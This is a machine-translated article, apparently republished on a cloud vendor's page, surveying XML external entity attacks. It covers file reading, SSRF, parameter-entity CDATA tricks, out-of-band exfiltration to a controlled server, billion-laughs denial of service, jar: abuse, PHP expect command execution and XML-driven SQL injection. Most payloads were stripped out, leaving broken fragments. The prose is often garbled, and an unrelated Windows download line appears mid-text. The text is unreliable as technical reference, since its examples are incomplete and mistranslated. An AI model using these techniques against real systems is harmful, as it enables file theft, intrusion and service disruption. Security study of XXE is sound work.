XML security that you don't know about

Source: Internet
Author: User
Tags cdata ftp php file sql injection xml parser custom name

Introduction to 0x00 XML

XML Extensible Markup Language, designed to transmit and store data. Its various forms

For example:

1. Document Format (Ooxml,odf,pdf,rss,docx ...)

2. Picture format (svg,exif Headers,...)

3. configuration file (custom name, usually. xml)


Some of the features that are designed in XML, such as XML schemas (following the XML Schemas specification) and the Documents type definitions (DTDs), are the source of security issues. Even after a decade of public discussion, a large number of software has died in an attack on XML.

In fact, the XML entity mechanism is very well understood, you can directly use "escape" to understand the:& #x25和 &foo is the same in the original sense, but the latter is by ourselves to define arbitrary content.

In the case of DTDs, a DTD can declare an entity to define a variable (or a macro of a literal class) for use in the next DTD or XML document. A generic entity is defined in a DTD to access internal resources, get the text inside and replace its own XML document, and external entities are used to access external resources (that is, these resources can come from the local computer or remote host). In the process of parsing an external entity, the XML parser may use many network protocols and services (DNS,FTP,HTTP,SMB, etc.) depending on what is specified in the URL. It is useful for external entities to work with documents that are updated in real time, but attacks can occur in the process of parsing external entities. The means of attack include:

Read local file (may contain sensitive information/etc/shadow)

Memory violations

Arbitrary code Execution

Denial of Service

In this paper, we will make a summary of the XML attack methods that have occurred for a long time.

0x01 initial knowledge of XML external entity attack

Files that are based on external entities contain

The first proposed method of XML attack is to use the reference function of external entity to realize arbitrary file reading.

]> Joe &file; ...

However, this reading is limited, because the XML parser requires the referenced data to be complete, and we use an example to explain what is complete.

]> &first;&second;

When the XML document is sent to the server, it actually produces an error, although it can be perfectly closed when grouped together, but these entities are parsed once in the 3rd, 4 lines, and then thrown an error because they are not perfectly closed.

This error has made the XML attack a one-time chicken, because in fact many of the files are "closed form", such as in the PHP file recommendation is only the previous one "

What's worse, when you choose to include a complete XML file (such as a database connection file), the return result will be

As you can see, when the database configuration document in the label is embedded, most of the content is ellipses, showing only the structure of the document. This is determined by the XML parser attribute.

URL invocation

One of the most frequently overlooked XML attacks is the use of URL mechanisms and some of their strange features to expand the attack surface.

Although the XML specification does not require support for any particular URL mechanism, the underlying network libraries of many platforms support almost all URL mechanisms.

With URLs, an attacker could allow a host running xmlparser to initiate a malicious request to a third party host.

For example, "Server-side request Forgery" (SSRF). In theory, URL invocation can even be used to initiate a flood attack in an internal network.

What most people don't know is that even if external entities are disabled, many XML parsers will still parse those URLs. For example, some parsers will initiate a request to a URL at the document definition stage

This is not a physical attack!

In addition to external entities and DOCTYPE-based SSRF attacks, XML schemas provide two of special properties used in instance documents that indicate the location of the schema document. These two properties are: Xsi:schemalocation and xsi:nonamespaceschemalocation, which are used for schema documents that declare the target namespace, and for schema documents that do not have a target namespace, which are typically used in instance documents.

In this case, all with Secondaryns: prefixes follow the mechanism defined in Xmlns:secondaryns. Because the DOCTYPE definition does not appear in the middle of the document, we can use Schema_location (http://location/of/remote/schema/primary.xsd) When we are only able to control a part of the document. Initiate SSRF. (The premise is that some settings need to be set to ON, but we do not have sufficient testing of each XML parser to study the requirements of different environments to allow us to conduct ssrf attacks, so this is a research direction, interested Wooyuner can communicate ~)

0x02 the attack means after introducing the parameter entity

When our malicious XML is successfully parsed, we are likely to face two problems:

One, the data is not closed to cause embedding failure (for example, only exist

Second, the server restrictions cause the data to not return.

After the parameter entity is introduced, these two problems can be solved.

The argument entity begins with a% we use parameter entities to follow only two principles:

Parameter entities can only be used in DTD declarations. Parameter entities can no longer be referenced in parameter entities.

CDATA The Magical Escape

CDATA Part; Everything in the CDATA part is ignored by the XML parser, that is, the contents of the CDATA part tightly this is the function of a string literal. A CDATA part ends with a "" tag. So can we construct a page to return those files?

%DTD; ]> &all;

COMBINE.DTD is as follows

As mentioned earlier, when the XML parsers will explain the XML parameter entity% start, the error is thrown because there is no closure, so why does the%start in this case normally parse? This is because the reference to the parameter entity does not need to remain XML closed when parsing the XML document, bypassing the restriction.

By doing so we can read all the data (Base64 encoding is also possible)

Off-Go data bypass-echo restrictions

Another way to use parameter entities is to have the data in the takeout.

By using the parameter entity, we can send the files that need to be read through some protocol (HTTP FTP, etc.) to our server, then we can get the data through log view. We can construct this.

%DTD;] > &send;

And then, in our controllable http://example.com/,

Place the following DTD


Process is as follows

Win10 The latest edition of the official download/win10 installation graphics and text tutorial

XXe's Qi men dun Jia

Xinclude-based file contains

Xinclude provides a more convenient way to retrieve data (no longer need to worry about incomplete data and cause parser to throw an error) and we can enforce the reference file type by parse attribute.

However, Xinclude needs to be manually turned on, and the test finds that all XML parser turn off this feature by default.

Denial of Service

XXe attacks can also be used to initiate denial of service attacks

As follows recursive reference, from bottom to top in exponential form increase

]> &lol9;

Recall the parsing process, when the XML processor loads the document, it contains the root element, and the entity &lol9 is defined, and 19 entities are expanded to include the "&lol8;&lol8;&lol8;&lol8;& lol8;&lol8;&lol8;&lol8;&lol8;&lol8; " This string.

So recursively, things that ram into memory grow exponentially, and experiments have found that an XML attack less than 1KB payload can consume 3GB of memory.

Attacks and restrictions in a given environment


The default Oracle ' s Java Runtime Environment XML Parser is xerces, an Apache project. Xerces and Java provide a range of features that can lead to some serious security problems. The above attack techniques (Doctypes for SSRF, file read, parameter entity's take-out data) are freely available in the Java default configuration, Java/xerces also support xinclude but need Setxincludeaware (true) and Setnamespaceaware (true).

The Java specification can support the following URL mechanisms






Surprisingly, the Java file protocol can be used to list directories, for example, under Linux "file:///" will list/catalogue everything:







The JAR protocol Jar:http://host/application.jar!/file/within/the/zip will cause the server to get the file first and then unzip the end of the package with the jar and extract the following file. From an attacker's point of view, it is perfectly possible to customize some of the high compression ratios (such as 1000:1) that can be used to attack anti-virus systems or to consume the hard disk/memory resources of the target computer. Note that jar URLs can be used on any Java Xerces system that accepts DOCTYPE definitions. So, even if the external entity shuts down, it can be attacked.

Php&expect's Rce

Unfortunately, this extension is not installed by default, but installing this extended XXe vulnerability is capable of executing arbitrary commands.



Then it will return the following

uid=501 (Apple) gid=20 (staff) groups=20 (staff), 501 (ACCESS_BPF), (Everyone), (localaccounts), (_APPSERVERUSR), (admin), Bayi (_appserveradm),

(_lpadmin), 401 (COM.APPLE.SHAREPOINT.GROUP.1), (_appstore), (_lpoperator), 204 (_developer),

398 (com.apple.access_screensharing), 399 (COM.APPLE.ACCESS_SSH)

XML injection

This has nothing to do with the XXe attack, but this article is about XML security, so this nature is included in the

$GLOBALS ["Http_raw_post_data"] is set to "not escape" in PHP, and once the program gets the data through the entity, it is brought directly into MySQL and finally injects

The case is as follows

Wooyun:phpyun the latest version of XML injection and SQL injection get admin account (ignoring any defenses)

0X03 Summary

XXe attacks are always overlooked.

Developers often say:

Attacks are less threatening.

Shutting down the entity can completely avoid ...

What is an XML entity attack?

However, the attacks by XML entities have already generated many threats that are unexpected to developers.

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.